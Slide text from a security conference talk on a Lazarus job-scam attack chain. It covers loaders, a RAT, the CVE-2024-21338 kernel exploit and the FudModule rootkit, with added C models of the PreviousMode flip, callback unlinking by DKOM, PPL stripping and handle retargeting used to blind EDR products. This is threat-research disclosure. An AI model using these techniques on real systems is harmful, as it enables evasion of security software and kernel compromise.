From BYOVD to a 0-day: Unveiling Advanced Exploits in Cyber Recruiting Scams
Speakers: Luigino Camastra, Igor Morgenstern
Contributor: Jan Vojtesek

#BHASIA @BlackHatEvents
Agenda
• Introduction to prior research
• Attack chain analysis
• Initial ISO image
• Loaders
• RAT
• 0-day and vulnerability analysis
• Rootkit analysis

Prior research

Attack chain analysis
• The attack is initiated by presenting a fabricated job offer
• Contacting via LinkedIn, WhatsApp, email or other platforms

Attack chain analysis
RollFling Loader
• Discovered a new loader we called RollFling, together with an accompanying NLS file
• Malicious DLL installed as a service
• Kickstarts the execution chain
• Loads the next stage
• Obtains the XOR key by calling the GetSystemFirmwareTable API
• XOR-decrypts the file with the .nls extension
• The RollSling loader is stored encrypted in the NLS file
• Loads the decrypted RollSling into memory
• Shellcode executed in memory
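
An added illustration of the NLS decryption step, written for this page rather than taken from the talk or from the malware: a sandbox-style decryptor in C. The call to GetSystemFirmwareTable is replaced by a constructed RawSMBIOSData buffer so the code runs offline, and the assumption that the raw SMBIOS table data is used directly as a repeating XOR key is ours; the talk only states that the key is obtained through that API. The sample .nls blob is constructed by the code itself.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Layout returned by GetSystemFirmwareTable for the 'RSMB' provider (documented by Microsoft). */
typedef struct {
    uint8_t  Used20CallingMethod;
    uint8_t  SMBIOSMajorVersion;
    uint8_t  SMBIOSMinorVersion;
    uint8_t  DmiRevision;
    uint32_t Length;               /* number of bytes in SMBIOSTableData */
    uint8_t  SMBIOSTableData[];
} RawSMBIOSData;

/* Constructed stand-in for the firmware table: an 8-byte header plus 16 bytes of table data. */
static const uint8_t g_fake_rsmb[8 + 16] = {
    0x00, 0x03, 0x02, 0x00,                     /* Used20CallingMethod, SMBIOS 3.2, DmiRevision */
    0x10, 0x00, 0x00, 0x00,                     /* Length = 16, little-endian */
    0x1b, 0xa4, 0x3c, 0x5d, 0x7e, 0x9f, 0x02, 0x13,
    0x24, 0x35, 0x46, 0x57, 0x68, 0x79, 0x8a, 0x9b
};

/* Hypothetical replacement for GetSystemFirmwareTable('RSMB', 0, out, out_size):
 * copies the fake table when the buffer is large enough and returns the table size,
 * mirroring the real API's contract. */
static size_t fake_get_system_firmware_table(uint8_t *out, size_t out_size) {
    if (out != NULL && out_size >= sizeof g_fake_rsmb)
        memcpy(out, g_fake_rsmb, sizeof g_fake_rsmb);
    return sizeof g_fake_rsmb;
}

/* Key derivation (assumption: the SMBIOSTableData bytes are used as the key).
 * Length is read with memcpy because the buffer is not guaranteed to be 4-byte aligned. */
static int derive_xor_key(const uint8_t *raw, size_t raw_len,
                          const uint8_t **key, size_t *key_len) {
    uint32_t len;
    if (raw_len < sizeof(RawSMBIOSData)) return 0;
    memcpy(&len, raw + offsetof(RawSMBIOSData, Length), sizeof len);
    if (len == 0 || len > raw_len - sizeof(RawSMBIOSData)) return 0;
    *key = raw + offsetof(RawSMBIOSData, SMBIOSTableData);
    *key_len = len;
    return 1;
}

/* Repeating-key XOR in place; symmetric, so it both produces and undoes the .nls encoding. */
static void xor_buffer(uint8_t *buf, size_t buf_len, const uint8_t *key, size_t key_len) {
    for (size_t i = 0; i < buf_len; i++) buf[i] ^= key[i % key_len];
}

/* Decrypt an .nls blob into out and check that a PE image came out ('MZ' signature).
 * Returns 1 on success, 0 if the key cannot be derived, out is too small, or the
 * result does not look like a PE (wrong key, corrupted blob). */
int decrypt_nls(const uint8_t *nls, size_t nls_len, uint8_t *out, size_t out_cap) {
    uint8_t raw[64];
    const uint8_t *key; size_t key_len;
    size_t raw_len = fake_get_system_firmware_table(raw, sizeof raw);
    if (!derive_xor_key(raw, raw_len, &key, &key_len)) return 0;
    if (nls_len < 2 || nls_len > out_cap) return 0;
    memcpy(out, nls, nls_len);
    xor_buffer(out, nls_len, key, key_len);
    return out[0] == 'M' && out[1] == 'Z';
}

/* Build a constructed "encrypted NLS" from a fake PE stub so the example is self-contained.
 * Returns the blob length, or 0 on failure. */
size_t make_sample_nls(uint8_t *out, size_t out_cap) {
    static const uint8_t pe_stub[] = "MZ\x90\x00RollSling-stub";  /* fake DOS header start */
    size_t n = sizeof pe_stub - 1;
    uint8_t raw[64];
    const uint8_t *key; size_t key_len;
    size_t raw_len = fake_get_system_firmware_table(raw, sizeof raw);
    if (out_cap < n || !derive_xor_key(raw, raw_len, &key, &key_len)) return 0;
    memcpy(out, pe_stub, n);
    xor_buffer(out, n, key, key_len);
    return n;
}
```

On a real Windows host the two fake_get_system_firmware_table calls would be replaced by GetSystemFirmwareTable('RSMB', 0, buf, size); because the key is host-specific, an .nls file captured from one machine will not decrypt in a sandbox unless the SMBIOS table of the victim is replayed, which is the practical reason for writing the decryptor this way.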

Attack chain analysis
• RollSling is a loader discussed in Microsoft research ("Multiple North Korean threat actors exploiting the TeamCity CVE-2023-42793 vulnerability")
• Code similarities with the RollSling version discussed in the Microsoft research
• Sample hashes (SHA-256):
  Microsoft: d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca
  Gen Digital: e68ff1087c45a1711c3037dad427733ccb1211634d070b03cb3a3c7e836d210f

Attack chain analysis
RollSling Loader
• Locate the binary blob
• Holds various stages and configuration data: RollMid, 2x DLL binaries and the address of the C&C server
• Stored without a file extension
• Extracts the next stage from the binary blob
• Searches for the export function "StartAction"
• Loads and executes the next stage, RollMid, by calling its "StartAction" export

Attack chain analysis
RollMid Loader
• Loads the network module binary and parses the address of the C&C server
• Obtains an HTML file from the first C&C server
• Gets a PNG image from the second C&C server
• Steganography is used to extract the address of the third C&C server from the image
• Sends a POST request to get the Data Blob
• The Data Blob contains configuration data for the next stage
• Appends part of the Data Blob to the Kaolin RAT DLL on disk as an overlay
• Loads and executes the next stage, called Kaolin RAT

Attack chain analysis
Kaolin RAT
• Communication with the C&C server
• Network module DLL binary
• Encrypted with AES
• Custom RAT
• File compression capabilities
• Uploading files to the C&C
• Changing a file's last write timestamp
• Downloading a DLL file from the C&C server and loading it in memory
• Loading the exploit together with the FudModule rootkit

Living Off the Land: Vulnerable Drivers

Benefits
• Disrupt security software
• Hide indicators of infection
• Disable kernel-mode telemetry

Obstacles
• DSE (Driver Signature Enforcement)
• HVCI
• SMEP

Techniques
• Data-only attacks
• Signed malicious drivers
• Vulnerable drivers

Living Off the Land: Vulnerable Drivers

N-Day BYOVD
• Easy to pull off
• Lazarus previously abused dbutil_2_3.sys (Dell), ene.sys (ENE Technology Inc.)
• Straightforward to detect

Zero-Day BYOVD
• Attacker needs to discover a zero-day vulnerability
• Stealthier than n-day
• hw.sys exploited by Candiru
• Generates a suspicious event

Zero-Day OS
• Abuse built-in Windows drivers
• Reduced attack surface
• Highest level of stealth

CVE-2024-21338
• Vulnerable IOCTL dispatcher in appid.sys (AppLocker)
• Allows calling an arbitrary kernel function with partial control of the first argument
• SMEP prevents calling user-mode code
• kCFG requires the target to be a valid kCFG call target
• The IOCTL is exposed through \Device\AppId
• The caller must be running as LOCAL SERVICE

CVE-2024-21338 - exploitation
• Load the driver by writing an event to an AppLocker-related ETW provider
• Impersonate the LOCAL SERVICE account
• Use the write primitive to change the PreviousMode of the current thread to KernelMode
• With PreviousMode set to KernelMode, arbitrary kernel memory can be read and written through NtReadVirtualMemory/NtWriteVirtualMemory, because the user-address probing is skipped for kernel-mode callers
• Fixed by introducing an ExGetPreviousMode check
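
An added user-mode model of the two slides above, written for this page rather than taken from the authors' exploit or from Microsoft's driver code. It shows why a kernel function call with a controlled first argument is enough to flip KTHREAD.PreviousMode, why that turns NtWriteVirtualMemory into an arbitrary kernel write, and what an ExGetPreviousMode check in the dispatcher changes. Everything suffixed _model, the APPID_REQUEST_MODEL input layout, the zeroing gadget, the fake address space and the STATUS_ACCESS_DENIED return of the patched dispatcher are simplifications chosen for the example, not the real implementations.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef long NTSTATUS;
#define STATUS_SUCCESS           ((NTSTATUS)0x00000000L)
#define STATUS_ACCESS_VIOLATION  ((NTSTATUS)0xC0000005L)
#define STATUS_ACCESS_DENIED     ((NTSTATUS)0xC0000022L)
enum { KernelMode = 0, UserMode = 1 };            /* KPROCESSOR_MODE values */
#define MM_HIGHEST_USER_ADDRESS  0x00007FFFFFFEFFFFULL

/* Model of the one KTHREAD field the exploit cares about. */
typedef struct { uint8_t PreviousMode; } KTHREAD_MODEL;
static KTHREAD_MODEL g_current_thread = { UserMode };
static KTHREAD_MODEL *KeGetCurrentThread_model(void) { return &g_current_thread; }
static uint8_t ExGetPreviousMode_model(void) { return g_current_thread.PreviousMode; }
void set_previous_mode(uint8_t mode) { g_current_thread.PreviousMode = mode; }
uint8_t current_previous_mode(void) { return g_current_thread.PreviousMode; }

/* Model address space: a 4 KiB "kernel" page and a 4 KiB "user" page at fake virtual addresses. */
#define KERNEL_BASE 0xFFFFF80000000000ULL
#define USER_BASE   0x0000000000400000ULL
static uint8_t g_kernel[4096], g_user[4096];
static uint8_t *translate(uint64_t va, size_t len) {
    if (va >= KERNEL_BASE && va - KERNEL_BASE + len <= sizeof g_kernel) return g_kernel + (va - KERNEL_BASE);
    if (va >= USER_BASE && va - USER_BASE + len <= sizeof g_user) return g_user + (va - USER_BASE);
    return NULL;
}

/* Model of NtWriteVirtualMemory: the user-address probe only happens for user-mode callers. */
NTSTATUS NtWriteVirtualMemory_model(uint64_t dst_va, const void *src, size_t len) {
    if (ExGetPreviousMode_model() == UserMode && dst_va + len - 1 > MM_HIGHEST_USER_ADDRESS)
        return STATUS_ACCESS_VIOLATION;               /* ProbeForWrite rejects kernel addresses */
    uint8_t *dst = translate(dst_va, len);
    if (dst == NULL) return STATUS_ACCESS_VIOLATION;
    memcpy(dst, src, len);
    return STATUS_SUCCESS;
}

/* Hypothetical IOCTL input: a function pointer plus its first argument, both caller-controlled. */
typedef void (*KERNEL_FN)(void *);
typedef struct { KERNEL_FN Fn; void *Arg; } APPID_REQUEST_MODEL;

/* Vulnerable dispatcher: calls whatever the request names. SMEP and kCFG restrict Fn to
 * kernel-mode, kCFG-valid targets, but that still leaves usable kernel functions. */
NTSTATUS appid_ioctl_vulnerable(const APPID_REQUEST_MODEL *req) {
    req->Fn(req->Arg);
    return STATUS_SUCCESS;
}

/* Patched dispatcher (model): requests that arrive from user mode are refused. */
NTSTATUS appid_ioctl_fixed(const APPID_REQUEST_MODEL *req) {
    if (ExGetPreviousMode_model() != KernelMode) return STATUS_ACCESS_DENIED;
    req->Fn(req->Arg);
    return STATUS_SUCCESS;
}

/* Stand-in for a kCFG-valid kernel function whose side effect is to store a zero byte
 * through its first argument; zero is KernelMode, which is all the exploit needs. */
static void zeroing_gadget(void *p) { *(uint8_t *)p = 0; }

/* The chain: fresh user-mode thread, the IOCTL flips PreviousMode, then an ordinary
 * syscall writes into kernel memory. Returns the status of that final kernel write,
 * or STATUS_ACCESS_DENIED if the dispatcher refused the request. */
NTSTATUS run_exploit_chain(NTSTATUS (*dispatch)(const APPID_REQUEST_MODEL *)) {
    static const uint8_t payload[4] = { 0x41, 0x42, 0x43, 0x44 };
    g_current_thread.PreviousMode = UserMode;
    memset(g_kernel, 0, sizeof g_kernel);
    APPID_REQUEST_MODEL req = { zeroing_gadget, &KeGetCurrentThread_model()->PreviousMode };
    if (dispatch(&req) != STATUS_SUCCESS) return STATUS_ACCESS_DENIED;
    return NtWriteVirtualMemory_model(KERNEL_BASE + 0x100, payload, sizeof payload);
}

uint8_t kernel_byte(size_t offset) { return g_kernel[offset]; }
```

The detail worth keeping in mind from the model: the exploit never needs a kernel write primitive of its own beyond the one byte written by the gadget. Once PreviousMode reads KernelMode, every Nt* syscall that probes its arguments becomes a kernel read/write on the attacker's behalf, which is why the fix targets the dispatcher's caller check rather than any single gadget.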

FudModule 2.0
• Data-only rootkit, driven from user space through the kernel read/write primitive
• DKOM techniques (selected by a bitmask)
• 0x1 - Registry Callbacks
• 0x2 - Object Callbacks (no update)
• 0x4 - Process, Thread, and Image Kernel Callbacks
• 0x8 - File System MiniFilters
• 0x10 - Windows Filtering Platform
• 0x40 - Event Tracing for Windows: System Loggers
• 0x80 - Event Tracing for Windows: Provider GUIDs
• 0x100 - Image Verification Callbacks
• 0x200 - Direct Attacks on Security Software

FudModule 2.0
0x01 – Registry Callbacks
• Allow drivers to monitor and respond to changes in the registry
• Registered via CmRegisterCallbackEx
• DKOM
• Resolve CmUnRegisterCallback (export of ntoskrnl)
• Scan the function for lea rcx,[nt!CallbackListHead]
• Find the address of nt!CallbackListHead
• New: skip callbacks from ntoskrnl.exe, applockerfltr.sys, bfs.sys
• Replace the callback with ObIsKernelHandle and unlink the callback entry
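
The registry-callback pass as an added C model, written for this page rather than taken from FudModule: walk a CallbackListHead-style doubly linked list, leave entries whose routine lives in a skip-list module alone, and neuter the rest by pointing the routine at a harmless export and unlinking the entry. The node layout is simplified, the module map and its addresses are constructed, the two product driver names are hypothetical, and OB_IS_KERNEL_HANDLE_ADDR stands in for the resolved nt!ObIsKernelHandle export.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;

/* Simplified stand-in for the block the kernel links into nt!CallbackListHead for each
 * CmRegisterCallbackEx caller; the real structure has more fields, but the link and the
 * routine address are what the rootkit touches. The address is a uintptr_t so the model
 * can use fake kernel addresses instead of real function pointers. */
typedef struct {
    LIST_ENTRY Link;
    uintptr_t  Function;
    void      *Context;
} CM_CALLBACK_NODE;

typedef struct { const char *Name; uintptr_t Base; size_t Size; } LOADED_MODULE;

/* Constructed module map with fake load addresses (in practice obtained from
 * NtQuerySystemInformation / SystemModuleInformation). */
static const LOADED_MODULE g_modules[] = {
    { "ntoskrnl.exe",      0xFFFFF80000000000ULL, 0x1000000 },
    { "applockerfltr.sys", 0xFFFFF80010000000ULL, 0x10000 },
    { "bfs.sys",           0xFFFFF80011000000ULL, 0x10000 },
    { "edr_sensor.sys",    0xFFFFF80020000000ULL, 0x80000 },   /* hypothetical security product */
    { "av_filter.sys",     0xFFFFF80021000000ULL, 0x80000 },   /* hypothetical security product */
};
#define MODULE_COUNT (sizeof g_modules / sizeof g_modules[0])

/* The skip list named on the slide. */
static const char *const g_skip_list[] = { "ntoskrnl.exe", "applockerfltr.sys", "bfs.sys" };

/* Fake address standing in for the resolved nt!ObIsKernelHandle export. */
#define OB_IS_KERNEL_HANDLE_ADDR 0xFFFFF80000123450ULL

static const LOADED_MODULE *module_for_address(uintptr_t addr) {
    for (size_t i = 0; i < MODULE_COUNT; i++)
        if (addr >= g_modules[i].Base && addr < g_modules[i].Base + g_modules[i].Size) return &g_modules[i];
    return NULL;
}

static bool is_on_skip_list(const LOADED_MODULE *m) {
    for (size_t i = 0; i < sizeof g_skip_list / sizeof g_skip_list[0]; i++)
        if (strcmp(m->Name, g_skip_list[i]) == 0) return true;
    return false;
}

static void InitializeListHead(LIST_ENTRY *h) { h->Flink = h->Blink = h; }
static void InsertTailList(LIST_ENTRY *h, LIST_ENTRY *e) { e->Flink = h; e->Blink = h->Blink; h->Blink->Flink = e; h->Blink = e; }
static void RemoveEntryList(LIST_ENTRY *e) { e->Blink->Flink = e->Flink; e->Flink->Blink = e->Blink; }

/* The DKOM pass: walk the list, leave callbacks owned by skip-list modules alone, and
 * neuter everything else (routine -> harmless export, entry unlinked and pointed at
 * itself). Unknown addresses are treated as hostile. Returns the number neutered. */
int dkom_neuter_registry_callbacks(LIST_ENTRY *head) {
    int neutered = 0;
    for (LIST_ENTRY *e = head->Flink; e != head; ) {
        LIST_ENTRY *next = e->Flink;                       /* save before unlinking */
        CM_CALLBACK_NODE *node = (CM_CALLBACK_NODE *)e;    /* Link is the first member */
        const LOADED_MODULE *owner = module_for_address(node->Function);
        if (owner == NULL || !is_on_skip_list(owner)) {
            node->Function = OB_IS_KERNEL_HANDLE_ADDR;     /* harmless if anything still calls through the block */
            RemoveEntryList(e);
            e->Flink = e->Blink = e;
            neutered++;
        }
        e = next;
    }
    return neutered;
}

int count_list(const LIST_ENTRY *head) {
    int n = 0;
    for (const LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) n++;
    return n;
}

/* Constructed sample: one registered callback per module above. */
static CM_CALLBACK_NODE g_nodes[MODULE_COUNT];
static LIST_ENTRY g_callback_list_head;

LIST_ENTRY *build_sample_callback_list(void) {
    InitializeListHead(&g_callback_list_head);
    for (size_t i = 0; i < MODULE_COUNT; i++) {
        g_nodes[i].Function = g_modules[i].Base + 0x1000;   /* somewhere inside that image */
        g_nodes[i].Context = NULL;
        InsertTailList(&g_callback_list_head, &g_nodes[i].Link);
    }
    return &g_callback_list_head;
}

uintptr_t sample_node_function(size_t i) { return g_nodes[i].Function; }
bool sample_node_is_orphaned(size_t i) { return g_nodes[i].Link.Flink == &g_nodes[i].Link; }
```

The same unlink-and-self-point operation is what the minifilter pass applies to FLTMGR!_CALLBACK_NODE entries; only the list being walked and the ownership check differ. For defenders, the observable is the mismatch between the callbacks a product believes it registered and what a walk of nt!CallbackListHead actually returns.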

FudModule 2.0
0x02 – Object Callbacks - no update
• Monitor and respond to thread, process, and desktop handle operations
• Registered via ObRegisterCallbacks
• DKOM
• Resolve ObGetObjectType (export of ntoskrnl)
• Find nt!ObTypeIndexTable
• nt!ObTypeIndexTable is an array of pointers to _OBJECT_TYPE structures
• Iterate over each type's CallbackList
• Make each list entry point to itself

FudModule 2.0
0x04 - Process, Thread, and Image Kernel Callbacks
• Registered via
• PsSetCreateProcessNotifyRoutine
• PsSetCreateThreadNotifyRoutine
• PsSetLoadImageNotifyRoutine
• DKOM
• Resolve nt!PspNotifyEnableMask, nt!Psp(LoadImage|CreateThread|CreateProcess)NotifyRoutine
• Clear nt!PspNotifyEnableMask
• Create new arrays containing only callbacks from whitelisted modules
• Revert nt!PspNotifyEnableMask
• Whitelisted modules: ntoskrnl.exe, ahcache.sys, mmcss.sys, cng.sys, ksecdd.sys, tcpip.sys, iorate.sys, ci.dll, dxgkrnl.sys, peauth.sys, wtd.sys
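
The three DKOM steps above as an added C model, written for this page rather than taken from FudModule, for one of the three arrays (the thread and image arrays get the same pass). It shows the part the slide leaves implicit: each slot holds an EX_FAST_REF whose low 4 bits are a reference count, so the rebuilt array must copy the slot values, not just the routine addresses. The routine block layout is simplified, the module map and its addresses are constructed, edr_sensor.sys is hypothetical, and the value placed in PspNotifyEnableMask is arbitrary.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PSP_MAX_CALLBACKS 64        /* slots in nt!PspCreateProcessNotifyRoutine and its siblings */
#define EX_FAST_REF_MASK  0xFULL    /* low 4 bits of an EX_FAST_REF are a reference count */

/* Simplified _EX_CALLBACK_ROUTINE_BLOCK: the kernel stores the registered routine here and
 * keeps an EX_FAST_REF (pointer | refcount) to the block in the array slot. */
typedef struct { uintptr_t Function; void *Context; } EX_CALLBACK_ROUTINE_BLOCK;
typedef uintptr_t EX_FAST_REF;

static EX_CALLBACK_ROUTINE_BLOCK *fast_ref_object(EX_FAST_REF r) {
    return (EX_CALLBACK_ROUTINE_BLOCK *)(r & ~EX_FAST_REF_MASK);
}

typedef struct { const char *Name; uintptr_t Base; size_t Size; } LOADED_MODULE;

/* Constructed module map with fake load addresses. */
static const LOADED_MODULE g_modules[] = {
    { "ntoskrnl.exe",   0xFFFFF80000000000ULL, 0x1000000 },
    { "cng.sys",        0xFFFFF80010000000ULL, 0x80000 },
    { "tcpip.sys",      0xFFFFF80011000000ULL, 0x200000 },
    { "edr_sensor.sys", 0xFFFFF80020000000ULL, 0x80000 },   /* hypothetical security product */
};
#define MODULE_COUNT (sizeof g_modules / sizeof g_modules[0])

/* The whitelist from the slide. */
static const char *const g_whitelist[] = {
    "ntoskrnl.exe", "ahcache.sys", "mmcss.sys", "cng.sys", "ksecdd.sys", "tcpip.sys",
    "iorate.sys", "ci.dll", "dxgkrnl.sys", "peauth.sys", "wtd.sys",
};

static bool function_is_whitelisted(uintptr_t fn) {
    for (size_t i = 0; i < MODULE_COUNT; i++) {
        const LOADED_MODULE *m = &g_modules[i];
        if (fn < m->Base || fn >= m->Base + m->Size) continue;
        for (size_t j = 0; j < sizeof g_whitelist / sizeof g_whitelist[0]; j++)
            if (strcmp(m->Name, g_whitelist[j]) == 0) return true;
        return false;                                    /* known module, not whitelisted */
    }
    return false;                                        /* address in no known module */
}

/* Model of the two kernel globals the rootkit resolves. */
typedef struct {
    uint32_t    PspNotifyEnableMask;
    EX_FAST_REF PspCreateProcessNotifyRoutine[PSP_MAX_CALLBACKS];
} PSP_NOTIFY_STATE;

/* The DKOM pass: clear the enable mask so the kernel stops consulting the array, rebuild
 * it with only whitelisted callbacks (refcount bits preserved, entries compacted), then
 * restore the mask. Returns the number of callbacks that survived. */
int dkom_filter_notify_routines(PSP_NOTIFY_STATE *s) {
    uint32_t saved_mask = s->PspNotifyEnableMask;
    EX_FAST_REF kept[PSP_MAX_CALLBACKS];
    int n = 0;
    memset(kept, 0, sizeof kept);
    s->PspNotifyEnableMask = 0;
    for (int i = 0; i < PSP_MAX_CALLBACKS; i++) {
        EX_FAST_REF ref = s->PspCreateProcessNotifyRoutine[i];
        EX_CALLBACK_ROUTINE_BLOCK *blk = fast_ref_object(ref);
        if (blk != NULL && function_is_whitelisted(blk->Function)) kept[n++] = ref;
    }
    memcpy(s->PspCreateProcessNotifyRoutine, kept, sizeof kept);
    s->PspNotifyEnableMask = saved_mask;
    return n;
}

/* Constructed sample: one callback per module above, registered in sparse slots with a
 * refcount of 1. Blocks are placed on a 16-byte boundary by hand; real pool allocations
 * are 16-byte aligned too, which is what frees the low 4 bits for the refcount. */
static uint8_t g_block_storage[MODULE_COUNT * sizeof(EX_CALLBACK_ROUTINE_BLOCK) + 16];
static PSP_NOTIFY_STATE g_state;

PSP_NOTIFY_STATE *build_sample_state(void) {
    uintptr_t base = ((uintptr_t)g_block_storage + 15) & ~(uintptr_t)15;
    EX_CALLBACK_ROUTINE_BLOCK *blocks = (EX_CALLBACK_ROUTINE_BLOCK *)base;
    memset(&g_state, 0, sizeof g_state);
    g_state.PspNotifyEnableMask = 0x7;     /* arbitrary non-zero value; real bit meanings not modelled */
    for (size_t i = 0; i < MODULE_COUNT; i++) {
        blocks[i].Function = g_modules[i].Base + 0x2000;  /* somewhere inside that image */
        blocks[i].Context = NULL;
        g_state.PspCreateProcessNotifyRoutine[i * 5] = (EX_FAST_REF)&blocks[i] | 1;
    }
    return &g_state;
}

uintptr_t slot_function(const PSP_NOTIFY_STATE *s, int slot) {
    EX_CALLBACK_ROUTINE_BLOCK *blk = fast_ref_object(s->PspCreateProcessNotifyRoutine[slot]);
    return blk != NULL ? blk->Function : 0;
}
```

Clearing the mask before the rewrite and restoring it afterwards is what keeps the kernel from walking a half-rebuilt array on another CPU; the survivor count is the only thing a defender can still observe from the outside, and it will be lower than the number of routines the dropped product believes it registered.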

FudModule 2.0
0x08 – Minifilter Drivers
• Mechanism for drivers to intercept file system operations
• HVCI prevents patching the filter function
• Iterates over _FLT_VOLUME.Callbacks.OperationsLists
• Indexed by IRP major function codes
• An array of linked lists of FLTMGR!_CALLBACK_NODE

FudModule 2.0
0x10 – Windows Filtering Platform (WFP)
• Network traffic filtering and packet inspection
• Checks for Kaspersky drivers
• Locate netio!gWfpGlobal
• Iterate over the array of CALLOU structs
• Set FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW on each callout
• With that flag set, the callout function is called only if there is a context associated with the data flow, so callouts that never attached a flow context are no longer invoked

FudModule 2.0
0x40 – Event Tracing for Windows: System Loggers
• High-performance mechanism for tracing and logging events
• Zeroes out EtwpActiveSystemLoggers

FudModule 2.0
0x80 – Event Tracing for Windows: Provider GUIDs
• Contains a hardcoded list of 95 provider GUIDs
• For each provider, zeroes out four masks, namely EnableMask, GroupEnableMask, HostEnableMask, and HostGroupEnableMask

FudModule 2.0
0x100 – Image Verification Callbacks
• Invoked whenever a new driver image is loaded into kernel memory
• Useful functionality for anti-malware software to block malicious or vulnerable drivers
• Registered via SeRegisterImageVerificationCallback

FudModule 2.0
0x200 – Direct Attacks on Security Software
• Targets the _EPROCESS of asdsvc.exe (AhnLab Smart Defense Service)
• Targeting security solutions: AhnLab V3 Endpoint Security
• Clearing the Protection field makes it just a regular non-protected process
• It is opened up for further attacks from user mode
• Disrupts the link between user-mode and kernel-mode components

    struct _EPROCESS
    {
        struct _KPROCESS Pcb;
        struct _EX_PUSH_LOCK ProcessLock;
        VOID* UniqueProcessId;
        struct _LIST_ENTRY ActiveProcessLinks;
        struct _EX_RUNDOWN_REF RundownProtect;
        ...
        struct _EJOB* ServerSilo;
        UCHAR SignatureLevel;
        UCHAR SectionSignatureLevel;
        struct _PS_PROTECTION Protection;
        UCHAR HangCount:3;
        UCHAR GhostCount:3;
        UCHAR PrefilterException:1;
        ...
    }

FudModule 2.0
0x200 – Direct Attacks on Security Software
• This step is used to increase stability
• Leaks its own _EPROCESS structure
• Zeroes out MitigationFlags
• Clears the EnableHandleExceptions flag in _EPROCESS.ObjectTable.Flags

FudModule 2.0
0x200 – Direct Attacks on Security Software
• What is the handle table used for?
• The kernel must be able to translate a handle to the corresponding object

FudModule 2.0
0x200 – Direct Attacks on Security Software
• Creates a dummy thread and opens it with THREAD_ALL_ACCESS rights
• Modifies ObjectPointerBits in that handle's table entry
• This makes the handle reference an arbitrary object and enables the rootkit to perform privileged operations on it
• Target: the _EPROCESS structure of one of the targeted processes: MsSense.exe (Microsoft Defender for Endpoint sensor), MsMpEng.exe (Malware Protection Engine), CSFalconService.exe (CrowdStrike), Hmpalert.exe (HitmanPro)
• Suspends the process and all of its threads for each targeted process
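
The 0x200 steps above as an added C model, written for this page rather than taken from FudModule: clearing _PS_PROTECTION on a process, and rewriting ObjectPointerBits of a handle table entry so a THREAD_ALL_ACCESS handle to a dummy thread refers to a target _EPROCESS instead. The _PS_PROTECTION and _HANDLE_TABLE_ENTRY bit layouts are the x64 Windows 10+ ones (the real structures use anonymous unions; they are named here for portability); the kernel addresses, EPROCESS_MODEL and make_entry are constructed for the example. MitigationFlags and EnableHandleExceptions are not modelled.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* _PS_PROTECTION: a single byte, Type:3 | Audit:1 | Signer:4. */
typedef union {
    uint8_t Level;
    struct { uint8_t Type : 3, Audit : 1, Signer : 4; } s;
} PS_PROTECTION;
enum { PsProtectedTypeNone = 0, PsProtectedTypeProtectedLight = 1, PsProtectedTypeProtected = 2 };
enum { PsProtectedSignerNone = 0, PsProtectedSignerAntimalware = 3 };

/* Only the _EPROCESS fields this model touches. */
typedef struct { uint64_t UniqueProcessId; PS_PROTECTION Protection; } EPROCESS_MODEL;

bool process_is_protected(const EPROCESS_MODEL *p) { return p->Protection.Level != 0; }
/* First step on the slides: clear Protection so the service becomes a plain, unprotected process. */
void dkom_unprotect(EPROCESS_MODEL *p) { p->Protection.Level = 0; }

/* _HANDLE_TABLE_ENTRY on x64 Windows 10+: 16 bytes. The low qword packs bits 4..47 of the
 * object header address into 44 bits; the high qword carries the granted-access mask. */
typedef struct {
    union {
        uint64_t LowValue;
        struct { uint64_t Unlocked : 1, RefCnt : 16, Attributes : 3, ObjectPointerBits : 44; } s;
    } Low;
    union {
        uint64_t HighValue;
        struct { uint32_t GrantedAccessBits : 25, NoRightsUpgrade : 1, Spare1 : 6; uint32_t Spare2; } s;
    } High;
} HANDLE_TABLE_ENTRY;

#define OBJECT_HEADER_SIZE 0x30ULL          /* x64 _OBJECT_HEADER; the object body follows it */
#define THREAD_ALL_ACCESS  0x1FFFFFu
#define PROCESS_ALL_ACCESS 0x1FFFFFu        /* same value as THREAD_ALL_ACCESS on current Windows */

/* The kernel reconstructs the canonical header pointer from the stored bits. */
uint64_t entry_object_header(const HANDLE_TABLE_ENTRY *e) {
    return ((uint64_t)e->Low.s.ObjectPointerBits << 4) | 0xFFFF000000000000ULL;
}
uint64_t entry_object_body(const HANDLE_TABLE_ENTRY *e) {
    return entry_object_header(e) + OBJECT_HEADER_SIZE;
}

/* The DKOM step: rewrite ObjectPointerBits so an existing handle refers to a different
 * object body. GrantedAccessBits are left untouched, which is the point of opening the
 * dummy thread with THREAD_ALL_ACCESS first: the same bits read as PROCESS_ALL_ACCESS
 * once the entry points at a process object. */
void retarget_handle_entry(HANDLE_TABLE_ENTRY *e, uint64_t object_body) {
    uint64_t header = object_body - OBJECT_HEADER_SIZE;
    e->Low.s.ObjectPointerBits = (header >> 4) & ((1ULL << 44) - 1);
}

/* Model of the entry created for the dummy thread handle; fields the model does not
 * need are left at zero. */
HANDLE_TABLE_ENTRY make_entry(uint64_t object_body, uint32_t granted_access) {
    HANDLE_TABLE_ENTRY e;
    memset(&e, 0, sizeof e);
    e.Low.s.Unlocked = 1;
    e.High.s.GrantedAccessBits = granted_access;
    retarget_handle_entry(&e, object_body);
    return e;
}
```

After the retarget, every user-mode API the rootkit calls with that handle (NtSuspendProcess included) goes through the normal access check against GrantedAccessBits and succeeds, which is why no further kernel write is needed to suspend the target; the only kernel-side precondition is that the target's Protection byte was cleared first, so that the PPL check on the process object does not reject the caller.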

Conclusion
• The Lazarus group is investing significant resources
• Despite various mitigations, kernel-based security solutions remain vulnerable
• Despite its sophisticated attacks, Lazarus still uses phishing as an infection vector

Thank you
